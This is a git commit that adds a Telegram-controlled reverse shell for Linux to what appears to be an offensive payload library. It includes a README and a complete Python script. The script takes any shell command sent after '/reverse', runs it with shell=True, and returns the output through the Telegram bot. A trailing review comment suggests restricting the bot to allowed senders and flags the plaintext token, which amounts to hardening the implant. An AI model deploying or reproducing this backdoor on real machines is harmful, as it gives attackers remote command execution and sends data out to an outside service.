pull/195/head
aleff-github 2023-08-03 10:35:53 +02:00
parent 8c3ca28399
commit 72ac8927b3
2 changed files with 84 additions and 0 deletions


@ -0,0 +1,41 @@
# Persistent Reverse Shell - Telegram Based
A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
**Category**: Execution
## Dependencies
* Internet Connection
## Description
A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.
The script accept the `/reverse` command using the format `/reverse <shell_command>` and split `/reverse` from `<shell_command>` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`.
Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>


@ -0,0 +1,43 @@
from telebot import TeleBot, types
import subprocess
# Set here the Telegram bot token
BOT_TOKEN = ""
bot = TeleBot(BOT_TOKEN)
commands = [
types.BotCommand("/reverse", "/reverse <shell_command>")
]
bot.set_my_commands(commands=commands)
@bot.message_handler(commands=['reverse'])
def reverse_shell(message):
command = extract_command(message.text)
if command != "":
print(f"Command received: {command}")
out = run_command(command)
if len(out) > 1000:
bot.reply_to(message, "Message too long...")
chunk_size = 1000
for i in range(0, len(out), chunk_size):
bot.send_message(message.chat.id, out[i:i+chunk_size])
else:
bot.reply_to(message, out)
def extract_command(message):
command_prefix = "/reverse"
if message.startswith(command_prefix):
return message[len(command_prefix):].strip()
else:
return None
def run_command(command):
try:
result = subprocess.check_output(command, shell=True, text=True)
return result.strip()
except subprocess.CalledProcessError as e:
return f"Some error: {e}"
bot.infinity_polling()
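Review bot: `reverse_shell` never checks who sent the message before its text reaches `subprocess.check_output(command, shell=True, text=True)`, so any Telegram account that can message the bot gets command execution as the user running the script. The handler should reject unknown senders on its first line, for example `if message.from_user.id not in ALLOWED_USER_IDS: return`, where `ALLOWED_USER_IDS` is a name I am proposing to sit next to `BOT_TOKEN`, not one already in the file. `BOT_TOKEN` is stored in plaintext in the script, so anyone who can read the file on the host can also drive the bot; a comment above it should say so. Separately, `extract_command` returns `None` when the prefix is missing while the caller tests `command != ""`, so a `None` would be passed on to `run_command`; returning `""` there keeps the two consistent.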